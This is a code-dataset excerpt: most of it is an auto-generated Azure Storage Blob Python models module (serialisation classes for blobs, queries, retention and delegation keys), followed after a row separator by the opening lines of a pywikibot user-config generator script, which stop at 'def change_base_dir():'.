:type content_type: str
:param content_encoding: Content encoding for given resource
:type content_encoding: str
:param content_language: Content language for given resource
:type content_language: str
:param content_disposition: Content disposition for given resource
:type content_disposition: str
"""
_attribute_map = {
'cache_control': {'key': '', 'type': 'str', 'xml': {'name': 'cache_control'}},
'content_type': {'key': '', 'type': 'str', 'xml': {'name': 'content_type'}},
'content_encoding': {'key': '', 'type': 'str', 'xml': {'name': 'content_encoding'}},
'content_language': {'key': '', 'type': 'str', 'xml': {'name': 'content_language'}},
'content_disposition': {'key': '', 'type': 'str', 'xml': {'name': 'content_disposition'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(DirectoryHttpHeaders, self).__init__(**kwargs)
self.cache_control = kwargs.get('cache_control', None)
self.content_type = kwargs.get('content_type', None)
self.content_encoding = kwargs.get('content_encoding', None)
self.content_language = kwargs.get('content_language', None)
self.content_disposition = kwargs.get('content_disposition', None)
class FilterBlobItem(Model):
"""Blob info from a Filter Blobs API call.
All required parameters must be populated in order to send to Azure.
:param name: Required.
:type name: str
:param container_name: Required.
:type container_name: str
:param tag_value: Required.
:type tag_value: str
"""
_validation = {
'name': {'required': True},
'container_name': {'required': True},
'tag_value': {'required': True},
}
_attribute_map = {
'name': {'key': 'Name', 'type': 'str', 'xml': {'name': 'Name'}},
'container_name': {'key': 'ContainerName', 'type': 'str', 'xml': {'name': 'ContainerName'}},
'tag_value': {'key': 'TagValue', 'type': 'str', 'xml': {'name': 'TagValue'}},
}
_xml_map = {
'name': 'Blob'
}
def __init__(self, **kwargs):
super(FilterBlobItem, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.container_name = kwargs.get('container_name', None)
self.tag_value = kwargs.get('tag_value', None)
class FilterBlobSegment(Model):
"""The result of a Filter Blobs API call.
All required parameters must be populated in order to send to Azure.
:param service_endpoint: Required.
:type service_endpoint: str
:param where: Required.
:type where: str
:param blobs: Required.
:type blobs: list[~azure.storage.blob.models.FilterBlobItem]
:param next_marker:
:type next_marker: str
"""
_validation = {
'service_endpoint': {'required': True},
'where': {'required': True},
'blobs': {'required': True},
}
_attribute_map = {
'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'name': 'ServiceEndpoint', 'attr': True}},
'where': {'key': 'Where', 'type': 'str', 'xml': {'name': 'Where'}},
'blobs': {'key': 'Blobs', 'type': '[FilterBlobItem]', 'xml': {'name': 'Blobs', 'itemsName': 'Blobs', 'wrapped': True}},
'next_marker': {'key': 'NextMarker', 'type': 'str', 'xml': {'name': 'NextMarker'}},
}
_xml_map = {
'name': 'EnumerationResults'
}
def __init__(self, **kwargs):
super(FilterBlobSegment, self).__init__(**kwargs)
self.service_endpoint = kwargs.get('service_endpoint', None)
self.where = kwargs.get('where', None)
self.blobs = kwargs.get('blobs', None)
self.next_marker = kwargs.get('next_marker', None)
class GeoReplication(Model):
"""Geo-Replication information for the Secondary Storage Service.
All required parameters must be populated in order to send to Azure.
:param status: Required. The status of the secondary location. Possible
values include: 'live', 'bootstrap', 'unavailable'
:type status: str or ~azure.storage.blob.models.GeoReplicationStatusType
:param last_sync_time: Required. A GMT date/time value, to the second. All
primary writes preceding this value are guaranteed to be available for
read operations at the secondary. Primary writes after this point in time
may or may not be available for reads.
:type last_sync_time: datetime
"""
_validation = {
'status': {'required': True},
'last_sync_time': {'required': True},
}
_attribute_map = {
'status': {'key': 'Status', 'type': 'str', 'xml': {'name': 'Status'}},
'last_sync_time': {'key': 'LastSyncTime', 'type': 'rfc-1123', 'xml': {'name': 'LastSyncTime'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(GeoReplication, self).__init__(**kwargs)
self.status = kwargs.get('status', None)
self.last_sync_time = kwargs.get('last_sync_time', None)
class JsonTextConfiguration(Model):
"""json text configuration.
All required parameters must be populated in order to send to Azure.
:param record_separator: Required. record separator
:type record_separator: str
"""
_validation = {
'record_separator': {'required': True},
}
_attribute_map = {
'record_separator': {'key': 'RecordSeparator', 'type': 'str', 'xml': {'name': 'RecordSeparator'}},
}
_xml_map = {
'name': 'JsonTextConfiguration'
}
def __init__(self, **kwargs):
super(JsonTextConfiguration, self).__init__(**kwargs)
self.record_separator = kwargs.get('record_separator', None)
class KeyInfo(Model):
"""Key information.
All required parameters must be populated in order to send to Azure.
:param start: Required. The date-time the key is active in ISO 8601 UTC
time
:type start: str
:param expiry: Required. The date-time the key expires in ISO 8601 UTC
time
:type expiry: str
"""
_validation = {
'start': {'required': True},
'expiry': {'required': True},
}
_attribute_map = {
'start': {'key': 'Start', 'type': 'str', 'xml': {'name': 'Start'}},
'expiry': {'key': 'Expiry', 'type': 'str', 'xml': {'name': 'Expiry'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(KeyInfo, self).__init__(**kwargs)
self.start = kwargs.get('start', None)
self.expiry = kwargs.get('expiry', None)
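# Illustrative sketch (editorial addition): KeyInfo carries the validity window
# for a user delegation key as ISO 8601 UTC strings (not datetime objects).
# The timestamps below are hypothetical.
def _example_key_info():
    return KeyInfo(start='2021-01-01T00:00:00Z', expiry='2021-01-02T00:00:00Z')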
class LeaseAccessConditions(Model):
"""Additional parameters for a set of operations.
:param lease_id: If specified, the operation only succeeds if the
resource's lease is active and matches this ID.
:type lease_id: str
"""
_attribute_map = {
'lease_id': {'key': '', 'type': 'str', 'xml': {'name': 'lease_id'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(LeaseAccessConditions, self).__init__(**kwargs)
self.lease_id = kwargs.get('lease_id', None)
class ListBlobsFlatSegmentResponse(Model):
"""An enumeration of blobs.
All required parameters must be populated in order to send to Azure.
:param service_endpoint: Required.
:type service_endpoint: str
:param container_name: Required.
:type container_name: str
:param prefix:
:type prefix: str
:param marker:
:type marker: str
:param max_results:
:type max_results: int
:param segment: Required.
:type segment: ~azure.storage.blob.models.BlobFlatListSegment
:param next_marker:
:type next_marker: str
"""
_validation = {
'service_endpoint': {'required': True},
'container_name': {'required': True},
'segment': {'required': True},
}
_attribute_map = {
'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'name': 'ServiceEndpoint', 'attr': True}},
'container_name': {'key': 'ContainerName', 'type': 'str', 'xml': {'name': 'ContainerName', 'attr': True}},
'prefix': {'key': 'Prefix', 'type': 'str', 'xml': {'name': 'Prefix'}},
'marker': {'key': 'Marker', 'type': 'str', 'xml': {'name': 'Marker'}},
'max_results': {'key': 'MaxResults', 'type': 'int', 'xml': {'name': 'MaxResults'}},
'segment': {'key': 'Segment', 'type': 'BlobFlatListSegment', 'xml': {'name': 'Segment'}},
'next_marker': {'key': 'NextMarker', 'type': 'str', 'xml': {'name': 'NextMarker'}},
}
_xml_map = {
'name': 'EnumerationResults'
}
def __init__(self, **kwargs):
super(ListBlobsFlatSegmentResponse, self).__init__(**kwargs)
self.service_endpoint = kwargs.get('service_endpoint', None)
self.container_name = kwargs.get('container_name', None)
self.prefix = kwargs.get('prefix', None)
self.marker = kwargs.get('marker', None)
self.max_results = kwargs.get('max_results', None)
self.segment = kwargs.get('segment', None)
self.next_marker = kwargs.get('next_marker', None)
class ListBlobsHierarchySegmentResponse(Model):
"""An enumeration of blobs.
All required parameters must be populated in order to send to Azure.
:param service_endpoint: Required.
:type service_endpoint: str
:param container_name: Required.
:type container_name: str
:param prefix:
:type prefix: str
:param marker:
:type marker: str
:param max_results:
:type max_results: int
:param delimiter:
:type delimiter: str
:param segment: Required.
:type segment: ~azure.storage.blob.models.BlobHierarchyListSegment
:param next_marker:
:type next_marker: str
"""
_validation = {
'service_endpoint': {'required': True},
'container_name': {'required': True},
'segment': {'required': True},
}
_attribute_map = {
'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'name': 'ServiceEndpoint', 'attr': True}},
'container_name': {'key': 'ContainerName', 'type': 'str', 'xml': {'name': 'ContainerName', 'attr': True}},
'prefix': {'key': 'Prefix', 'type': 'str', 'xml': {'name': 'Prefix'}},
'marker': {'key': 'Marker', 'type': 'str', 'xml': {'name': 'Marker'}},
'max_results': {'key': 'MaxResults', 'type': 'int', 'xml': {'name': 'MaxResults'}},
'delimiter': {'key': 'Delimiter', 'type': 'str', 'xml': {'name': 'Delimiter'}},
'segment': {'key': 'Segment', 'type': 'BlobHierarchyListSegment', 'xml': {'name': 'Segment'}},
'next_marker': {'key': 'NextMarker', 'type': 'str', 'xml': {'name': 'NextMarker'}},
}
_xml_map = {
'name': 'EnumerationResults'
}
def __init__(self, **kwargs):
super(ListBlobsHierarchySegmentResponse, self).__init__(**kwargs)
self.service_endpoint = kwargs.get('service_endpoint', None)
self.container_name = kwargs.get('container_name', None)
self.prefix = kwargs.get('prefix', None)
self.marker = kwargs.get('marker', None)
self.max_results = kwargs.get('max_results', None)
self.delimiter = kwargs.get('delimiter', None)
self.segment = kwargs.get('segment', None)
self.next_marker = kwargs.get('next_marker', None)
class ListContainersSegmentResponse(Model):
"""An enumeration of containers.
All required parameters must be populated in order to send to Azure.
:param service_endpoint: Required.
:type service_endpoint: str
:param prefix:
:type prefix: str
:param marker:
:type marker: str
:param max_results:
:type max_results: int
:param container_items: Required.
:type container_items: list[~azure.storage.blob.models.ContainerItem]
:param next_marker:
:type next_marker: str
"""
_validation = {
'service_endpoint': {'required': True},
'container_items': {'required': True},
}
_attribute_map = {
'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'name': 'ServiceEndpoint', 'attr': True}},
'prefix': {'key': 'Prefix', 'type': 'str', 'xml': {'name': 'Prefix'}},
'marker': {'key': 'Marker', 'type': 'str', 'xml': {'name': 'Marker'}},
'max_results': {'key': 'MaxResults', 'type': 'int', 'xml': {'name': 'MaxResults'}},
'container_items': {'key': 'ContainerItems', 'type': '[ContainerItem]', 'xml': {'name': 'Containers', 'itemsName': 'Containers', 'wrapped': True}},
'next_marker': {'key': 'NextMarker', 'type': 'str', 'xml': {'name': 'NextMarker'}},
}
_xml_map = {
'name': 'EnumerationResults'
}
def __init__(self, **kwargs):
super(ListContainersSegmentResponse, self).__init__(**kwargs)
self.service_endpoint = kwargs.get('service_endpoint', None)
self.prefix = kwargs.get('prefix', None)
self.marker = kwargs.get('marker', None)
self.max_results = kwargs.get('max_results', None)
self.container_items = kwargs.get('container_items', None)
self.next_marker = kwargs.get('next_marker', None)
class Logging(Model):
"""Azure Analytics Logging settings.
All required parameters must be populated in order to send to Azure.
:param version: Required. The version of Storage Analytics to configure.
:type version: str
:param delete: Required. Indicates whether all delete requests should be
logged.
:type delete: bool
:param read: Required. Indicates whether all read requests should be
logged.
:type read: bool
:param write: Required. Indicates whether all write requests should be
logged.
:type write: bool
:param retention_policy: Required.
:type retention_policy: ~azure.storage.blob.models.RetentionPolicy
"""
_validation = {
'version': {'required': True},
'delete': {'required': True},
'read': {'required': True},
'write': {'required': True},
'retention_policy': {'required': True},
}
_attribute_map = {
'version': {'key': 'Version', 'type': 'str', 'xml': {'name': 'Version'}},
'delete': {'key': 'Delete', 'type': 'bool', 'xml': {'name': 'Delete'}},
'read': {'key': 'Read', 'type': 'bool', 'xml': {'name': 'Read'}},
'write': {'key': 'Write', 'type': 'bool', 'xml': {'name': 'Write'}},
'retention_policy': {'key': 'RetentionPolicy', 'type': 'RetentionPolicy', 'xml': {'name': 'RetentionPolicy'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(Logging, self).__init__(**kwargs)
self.version = kwargs.get('version', None)
self.delete = kwargs.get('delete', None)
self.read = kwargs.get('read', None)
self.write = kwargs.get('write', None)
self.retention_policy = kwargs.get('retention_policy', None)
class Metrics(Model):
"""a summary of request statistics grouped by API in hour or minute aggregates
for blobs.
All required parameters must be populated in order to send to Azure.
:param version: The version of Storage Analytics to configure.
:type version: str
:param enabled: Required. Indicates whether metrics are enabled for the
Blob service.
:type enabled: bool
:param include_apis: Indicates whether metrics should generate summary
statistics for called API operations.
:type include_apis: bool
:param retention_policy:
:type retention_policy: ~azure.storage.blob.models.RetentionPolicy
"""
_validation = {
'enabled': {'required': True},
}
_attribute_map = {
'version': {'key': 'Version', 'type': 'str', 'xml': {'name': 'Version'}},
'enabled': {'key': 'Enabled', 'type': 'bool', 'xml': {'name': 'Enabled'}},
'include_apis': {'key': 'IncludeAPIs', 'type': 'bool', 'xml': {'name': 'IncludeAPIs'}},
'retention_policy': {'key': 'RetentionPolicy', 'type': 'RetentionPolicy', 'xml': {'name': 'RetentionPolicy'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(Metrics, self).__init__(**kwargs)
self.version = kwargs.get('version', None)
self.enabled = kwargs.get('enabled', None)
self.include_apis = kwargs.get('include_apis', None)
self.retention_policy = kwargs.get('retention_policy', None)
class ModifiedAccessConditions(Model):
"""Additional parameters for a set of operations.
:param if_modified_since: Specify this header value to operate only on a
blob if it has been modified since the specified date/time.
:type if_modified_since: datetime
:param if_unmodified_since: Specify this header value to operate only on a
blob if it has not been modified since the specified date/time.
:type if_unmodified_since: datetime
:param if_match: Specify an ETag value to operate only on blobs with a
matching value.
:type if_match: str
:param if_none_match: Specify an ETag value to operate only on blobs
without a matching value.
:type if_none_match: str
:param if_tags: Specify a SQL where clause on blob tags to operate only on
blobs with a matching value.
:type if_tags: str
"""
_attribute_map = {
'if_modified_since': {'key': '', 'type': 'rfc-1123', 'xml': {'name': 'if_modified_since'}},
'if_unmodified_since': {'key': '', 'type': 'rfc-1123', 'xml': {'name': 'if_unmodified_since'}},
'if_match': {'key': '', 'type': 'str', 'xml': {'name': 'if_match'}},
'if_none_match': {'key': '', 'type': 'str', 'xml': {'name': 'if_none_match'}},
'if_tags': {'key': '', 'type': 'str', 'xml': {'name': 'if_tags'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(ModifiedAccessConditions, self).__init__(**kwargs)
self.if_modified_since = kwargs.get('if_modified_since', None)
self.if_unmodified_since = kwargs.get('if_unmodified_since', None)
self.if_match = kwargs.get('if_match', None)
self.if_none_match = kwargs.get('if_none_match', None)
self.if_tags = kwargs.get('if_tags', None)
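# Illustrative sketch (editorial addition): conditional headers for optimistic
# concurrency. The ETag below is hypothetical; only the conditions that are
# set are sent with the request.
def _example_modified_access_conditions():
    # Operate on the blob only if its ETag still matches a previously read value.
    return ModifiedAccessConditions(if_match='"0x8D9A1B2C3D4E5F6"')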
class PageList(Model):
"""the list of pages.
:param page_range:
:type page_range: list[~azure.storage.blob.models.PageRange]
:param clear_range:
:type clear_range: list[~azure.storage.blob.models.ClearRange]
"""
_attribute_map = {
'page_range': {'key': 'PageRange', 'type': '[PageRange]', 'xml': {'name': 'PageRange', 'itemsName': 'PageRange'}},
'clear_range': {'key': 'ClearRange', 'type': '[ClearRange]', 'xml': {'name': 'ClearRange', 'itemsName': 'ClearRange'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(PageList, self).__init__(**kwargs)
self.page_range = kwargs.get('page_range', None)
self.clear_range = kwargs.get('clear_range', None)
class PageRange(Model):
"""PageRange.
All required parameters must be populated in order to send to Azure.
:param start: Required.
:type start: long
:param end: Required.
:type end: long
"""
_validation = {
'start': {'required': True},
'end': {'required': True},
}
_attribute_map = {
'start': {'key': 'Start', 'type': 'long', 'xml': {'name': 'Start'}},
'end': {'key': 'End', 'type': 'long', 'xml': {'name': 'End'}},
}
_xml_map = {
'name': 'PageRange'
}
def __init__(self, **kwargs):
super(PageRange, self).__init__(**kwargs)
self.start = kwargs.get('start', None)
self.end = kwargs.get('end', None)
class QueryFormat(Model):
"""QueryFormat.
:param type: Possible values include: 'delimited', 'json'
:type type: str or ~azure.storage.blob.models.QueryFormatType
:param delimited_text_configuration:
:type delimited_text_configuration:
~azure.storage.blob.models.DelimitedTextConfiguration
:param json_text_configuration:
:type json_text_configuration:
~azure.storage.blob.models.JsonTextConfiguration
"""
_attribute_map = {
'type': {'key': 'Type', 'type': 'QueryFormatType', 'xml': {'name': 'Type'}},
'delimited_text_configuration': {'key': 'DelimitedTextConfiguration', 'type': 'DelimitedTextConfiguration', 'xml': {'name': 'DelimitedTextConfiguration'}},
'json_text_configuration': {'key': 'JsonTextConfiguration', 'type': 'JsonTextConfiguration', 'xml': {'name': 'JsonTextConfiguration'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(QueryFormat, self).__init__(**kwargs)
self.type = kwargs.get('type', None)
self.delimited_text_configuration = kwargs.get('delimited_text_configuration', None)
self.json_text_configuration = kwargs.get('json_text_configuration', None)
class QueryRequest(Model):
"""the quick query body.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:ivar query_type: Required. The query type. Default value: "SQL".
:vartype query_type: str
:param expression: Required. a query statement
:type expression: str
:param input_serialization:
:type input_serialization: ~azure.storage.blob.models.QuerySerialization
:param output_serialization:
:type output_serialization: ~azure.storage.blob.models.QuerySerialization
"""
_validation = {
'query_type': {'required': True, 'constant': True},
'expression': {'required': True},
}
_attribute_map = {
'query_type': {'key': 'QueryType', 'type': 'str', 'xml': {'name': 'QueryType'}},
'expression': {'key': 'Expression', 'type': 'str', 'xml': {'name': 'Expression'}},
'input_serialization': {'key': 'InputSerialization', 'type': 'QuerySerialization', 'xml': {'name': 'InputSerialization'}},
'output_serialization': {'key': 'OutputSerialization', 'type': 'QuerySerialization', 'xml': {'name': 'OutputSerialization'}},
}
_xml_map = {
'name': 'QueryRequest'
}
query_type = "SQL"
def __init__(self, **kwargs):
super(QueryRequest, self).__init__(**kwargs)
self.expression = kwargs.get('expression', None)
self.input_serialization = kwargs.get('input_serialization', None)
self.output_serialization = kwargs.get('output_serialization', None)
class QuerySerialization(Model):
"""QuerySerialization.
All required parameters must be populated in order to send to Azure.
:param format: Required.
:type format: ~azure.storage.blob.models.QueryFormat
"""
_validation = {
'format': {'required': True},
}
_attribute_map = {
'format': {'key': 'Format', 'type': 'QueryFormat', 'xml': {'name': 'Format'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(QuerySerialization, self).__init__(**kwargs)
self.format = kwargs.get('format', None)
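# Illustrative sketch (editorial addition): composing a quick-query request
# that reads delimited (CSV-like) input and writes JSON records. The SQL
# expression and delimiter characters below are hypothetical.
def _example_query_request():
    input_format = QueryFormat(
        type='delimited',
        delimited_text_configuration=DelimitedTextConfiguration(
            column_separator=',',
            field_quote='"',
            record_separator='\n',
            escape_char='\\',
            headers_present=True,
        ),
    )
    output_format = QueryFormat(
        type='json',
        json_text_configuration=JsonTextConfiguration(record_separator='\n'),
    )
    return QueryRequest(
        expression='SELECT * FROM BlobStorage',
        input_serialization=QuerySerialization(format=input_format),
        output_serialization=QuerySerialization(format=output_format),
    )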
class RetentionPolicy(Model):
"""the retention policy which determines how long the associated data should
persist.
All required parameters must be populated in order to send to Azure.
:param enabled: Required. Indicates whether a retention policy is enabled
for the storage service
:type enabled: bool
:param days: Indicates the number of days that metrics or logging or
soft-deleted data should be retained. All data older than this value will
be deleted
:type days: int
"""
_validation = {
'enabled': {'required': True},
'days': {'minimum': 1},
}
_attribute_map = {
'enabled': {'key': 'Enabled', 'type': 'bool', 'xml': {'name': 'Enabled'}},
'days': {'key': 'Days', 'type': 'int', 'xml': {'name': 'Days'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(RetentionPolicy, self).__init__(**kwargs)
self.enabled = kwargs.get('enabled', None)
self.days = kwargs.get('days', None)
class SequenceNumberAccessConditions(Model):
"""Additional parameters for a set of operations, such as:
PageBlob_upload_pages, PageBlob_clear_pages,
PageBlob_upload_pages_from_url.
:param if_sequence_number_less_than_or_equal_to: Specify this header value
to operate only on a blob if it has a sequence number less than or equal
to the specified value.
:type if_sequence_number_less_than_or_equal_to: long
:param if_sequence_number_less_than: Specify this header value to operate
only on a blob if it has a sequence number less than the specified value.
:type if_sequence_number_less_than: long
:param if_sequence_number_equal_to: Specify this header value to operate
only on a blob if it has the specified sequence number.
:type if_sequence_number_equal_to: long
"""
_attribute_map = {
'if_sequence_number_less_than_or_equal_to': {'key': '', 'type': 'long', 'xml': {'name': 'if_sequence_number_less_than_or_equal_to'}},
'if_sequence_number_less_than': {'key': '', 'type': 'long', 'xml': {'name': 'if_sequence_number_less_than'}},
'if_sequence_number_equal_to': {'key': '', 'type': 'long', 'xml': {'name': 'if_sequence_number_equal_to'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(SequenceNumberAccessConditions, self).__init__(**kwargs)
self.if_sequence_number_less_than_or_equal_to = kwargs.get('if_sequence_number_less_than_or_equal_to', None)
self.if_sequence_number_less_than = kwargs.get('if_sequence_number_less_than', None)
self.if_sequence_number_equal_to = kwargs.get('if_sequence_number_equal_to', None)
class SignedIdentifier(Model):
"""signed identifier.
All required parameters must be populated in order to send to Azure.
:param id: Required. a unique id
:type id: str
:param access_policy:
:type access_policy: ~azure.storage.blob.models.AccessPolicy
"""
_validation = {
'id': {'required': True},
}
_attribute_map = {
'id': {'key': 'Id', 'type': 'str', 'xml': {'name': 'Id'}},
'access_policy': {'key': 'AccessPolicy', 'type': 'AccessPolicy', 'xml': {'name': 'AccessPolicy'}},
}
_xml_map = {
'name': 'SignedIdentifier'
}
def __init__(self, **kwargs):
super(SignedIdentifier, self).__init__(**kwargs)
self.id = kwargs.get('id', None)
self.access_policy = kwargs.get('access_policy', None)
class SourceModifiedAccessConditions(Model):
"""Additional parameters for a set of operations.
:param source_if_modified_since: Specify this header value to operate only
on a blob if it has been modified since the specified date/time.
:type source_if_modified_since: datetime
:param source_if_unmodified_since: Specify this header value to operate
only on a blob if it has not been modified since the specified date/time.
:type source_if_unmodified_since: datetime
:param source_if_match: Specify an ETag value to operate only on blobs
with a matching value.
:type source_if_match: str
:param source_if_none_match: Specify an ETag value to operate only on
blobs without a matching value.
:type source_if_none_match: str
:param source_if_tags: Specify a SQL where clause on blob tags to operate
only on blobs with a matching value.
:type source_if_tags: str
"""
_attribute_map = {
'source_if_modified_since': {'key': '', 'type': 'rfc-1123', 'xml': {'name': 'source_if_modified_since'}},
'source_if_unmodified_since': {'key': '', 'type': 'rfc-1123', 'xml': {'name': 'source_if_unmodified_since'}},
'source_if_match': {'key': '', 'type': 'str', 'xml': {'name': 'source_if_match'}},
'source_if_none_match': {'key': '', 'type': 'str', 'xml': {'name': 'source_if_none_match'}},
'source_if_tags': {'key': '', 'type': 'str', 'xml': {'name': 'source_if_tags'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(SourceModifiedAccessConditions, self).__init__(**kwargs)
self.source_if_modified_since = kwargs.get('source_if_modified_since', None)
self.source_if_unmodified_since = kwargs.get('source_if_unmodified_since', None)
self.source_if_match = kwargs.get('source_if_match', None)
self.source_if_none_match = kwargs.get('source_if_none_match', None)
self.source_if_tags = kwargs.get('source_if_tags', None)
class StaticWebsite(Model):
"""The properties that enable an account to host a static website.
All required parameters must be populated in order to send to Azure.
:param enabled: Required. Indicates whether this account is hosting a
static website
:type enabled: bool
:param index_document: The default name of the index page under each
directory
:type index_document: str
:param error_document404_path: The absolute path of the custom 404 page
:type error_document404_path: str
:param default_index_document_path: Absolute path of the default index
page
:type default_index_document_path: str
"""
_validation = {
'enabled': {'required': True},
}
_attribute_map = {
'enabled': {'key': 'Enabled', 'type': 'bool', 'xml': {'name': 'Enabled'}},
'index_document': {'key': 'IndexDocument', 'type': 'str', 'xml': {'name': 'IndexDocument'}},
'error_document404_path': {'key': 'ErrorDocument404Path', 'type': 'str', 'xml': {'name': 'ErrorDocument404Path'}},
'default_index_document_path': {'key': 'DefaultIndexDocumentPath', 'type': 'str', 'xml': {'name': 'DefaultIndexDocumentPath'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(StaticWebsite, self).__init__(**kwargs)
self.enabled = kwargs.get('enabled', None)
self.index_document = kwargs.get('index_document', None)
self.error_document404_path = kwargs.get('error_document404_path', None)
self.default_index_document_path = kwargs.get('default_index_document_path', None)
class StorageError(Model):
"""StorageError.
:param message:
:type message: str
"""
_attribute_map = {
'message': {'key': 'Message', 'type': 'str', 'xml': {'name': 'Message'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(StorageError, self).__init__(**kwargs)
self.message = kwargs.get('message', None)
class StorageErrorException(HttpResponseError):
"""Server responsed with exception of type: 'StorageError'.
:param deserialize: A deserializer
:param response: Server response to be deserialized.
"""
def __init__(self, response, deserialize, *args):
model_name = 'StorageError'
self.error = deserialize(model_name, response)
if self.error is None:
self.error = deserialize.dependencies[model_name]()
super(StorageErrorException, self).__init__(response=response)
class StorageServiceProperties(Model):
"""Storage Service Properties.
:param logging:
:type logging: ~azure.storage.blob.models.Logging
:param hour_metrics:
:type hour_metrics: ~azure.storage.blob.models.Metrics
:param minute_metrics:
:type minute_metrics: ~azure.storage.blob.models.Metrics
:param cors: The set of CORS rules.
:type cors: list[~azure.storage.blob.models.CorsRule]
:param default_service_version: The default version to use for requests to
the Blob service if an incoming request's version is not specified.
Possible values include version 2008-10-27 and all more recent versions
:type default_service_version: str
:param delete_retention_policy:
:type delete_retention_policy: ~azure.storage.blob.models.RetentionPolicy
:param static_website:
:type static_website: ~azure.storage.blob.models.StaticWebsite
"""
_attribute_map = {
'logging': {'key': 'Logging', 'type': 'Logging', 'xml': {'name': 'Logging'}},
'hour_metrics': {'key': 'HourMetrics', 'type': 'Metrics', 'xml': {'name': 'HourMetrics'}},
'minute_metrics': {'key': 'MinuteMetrics', 'type': 'Metrics', 'xml': {'name': 'MinuteMetrics'}},
'cors': {'key': 'Cors', 'type': '[CorsRule]', 'xml': {'name': 'Cors', 'itemsName': 'CorsRule', 'wrapped': True}},
'default_service_version': {'key': 'DefaultServiceVersion', 'type': 'str', 'xml': {'name': 'DefaultServiceVersion'}},
'delete_retention_policy': {'key': 'DeleteRetentionPolicy', 'type': 'RetentionPolicy', 'xml': {'name': 'DeleteRetentionPolicy'}},
'static_website': {'key': 'StaticWebsite', 'type': 'StaticWebsite', 'xml': {'name': 'StaticWebsite'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(StorageServiceProperties, self).__init__(**kwargs)
self.logging = kwargs.get('logging', None)
self.hour_metrics = kwargs.get('hour_metrics', None)
self.minute_metrics = kwargs.get('minute_metrics', None)
self.cors = kwargs.get('cors', None)
self.default_service_version = kwargs.get('default_service_version', None)
self.delete_retention_policy = kwargs.get('delete_retention_policy', None)
self.static_website = kwargs.get('static_website', None)
class StorageServiceStats(Model):
"""Stats for the storage service.
:param geo_replication:
:type geo_replication: ~azure.storage.blob.models.GeoReplication
"""
_attribute_map = {
'geo_replication': {'key': 'GeoReplication', 'type': 'GeoReplication', 'xml': {'name': 'GeoReplication'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(StorageServiceStats, self).__init__(**kwargs)
self.geo_replication = kwargs.get('geo_replication', None)
class UserDelegationKey(Model):
"""A user delegation key.
All required parameters must be populated in order to send to Azure.
:param signed_oid: Required. The Azure Active Directory object ID in GUID
format.
:type signed_oid: str
:param signed_tid: Required. The Azure Active Directory tenant ID in GUID
format
:type signed_tid: str
:param signed_start: Required. The date-time the key is active
:type signed_start: datetime
:param signed_expiry: Required. The date-time the key expires
:type signed_expiry: datetime
:param signed_service: Required. Abbreviation of the Azure Storage service
that accepts the key
:type signed_service: str
:param signed_version: Required. The service version that created the key
:type signed_version: str
:param value: Required. The key as a base64 string
:type value: str
"""
_validation = {
'signed_oid': {'required': True},
'signed_tid': {'required': True},
'signed_start': {'required': True},
'signed_expiry': {'required': True},
'signed_service': {'required': True},
'signed_version': {'required': True},
'value': {'required': True},
}
_attribute_map = {
'signed_oid': {'key': 'SignedOid', 'type': 'str', 'xml': {'name': 'SignedOid'}},
'signed_tid': {'key': 'SignedTid', 'type': 'str', 'xml': {'name': 'SignedTid'}},
'signed_start': {'key': 'SignedStart', 'type': 'iso-8601', 'xml': {'name': 'SignedStart'}},
'signed_expiry': {'key': 'SignedExpiry', 'type': 'iso-8601', 'xml': {'name': 'SignedExpiry'}},
'signed_service': {'key': 'SignedService', 'type': 'str', 'xml': {'name': 'SignedService'}},
'signed_version': {'key': 'SignedVersion', 'type': 'str', 'xml': {'name': 'SignedVersion'}},
'value': {'key': 'Value', 'type': 'str', 'xml': {'name': 'Value'}},
}
_xml_map = {
}
def __init__(self, **kwargs):
super(UserDelegationKey, self).__init__(**kwargs)
self.signed_oid = kwargs.get('signed_oid', None)
self.signed_tid = kwargs.get('signed_tid', None)
self.signed_start = kwargs.get('signed_start', None)
self.signed_expiry = kwargs.get('signed_expiry', None)
self.signed_service = kwargs.get('signed_service', None)
self.signed_version = kwargs.get('signed_version', None)
self.value = kwargs.get('value', None)
|
py | 1a40c9920db17307cb1fc1f7e9b2b3b9c5a21276 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Script to create user-config.py."""
#
# (C) Pywikibot team, 2010-2018
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
import codecs
from collections import namedtuple
import os
import re
import sys
from textwrap import fill
from generate_family_file import _import_with_no_user_config
# DISABLED_SECTIONS cannot be copied; variables must be set manually
DISABLED_SECTIONS = {'USER INTERFACE SETTINGS', # uses sys
'EXTERNAL EDITOR SETTINGS', # uses os
}
OBSOLETE_SECTIONS = {'ACCOUNT SETTINGS', # already set
'OBSOLETE SETTINGS', # obsolete
}
# Disable user-config usage as we are creating it here
pywikibot = _import_with_no_user_config('pywikibot')
config, __url__ = pywikibot.config2, pywikibot.__url__
base_dir = pywikibot.config2.base_dir
try:
console_encoding = sys.stdout.encoding
    # unittests fail with "StringIO instance has no attribute 'encoding'"
except AttributeError:
console_encoding = None
# the directory in which generate_user_files.py is located
pywikibot_dir = sys.path[0]
if console_encoding is None or sys.platform == 'cygwin':
console_encoding = 'iso-8859-1'
USER_BASENAME = 'user-config.py'
PASS_BASENAME = 'user-password.py'
def change_base_dir():
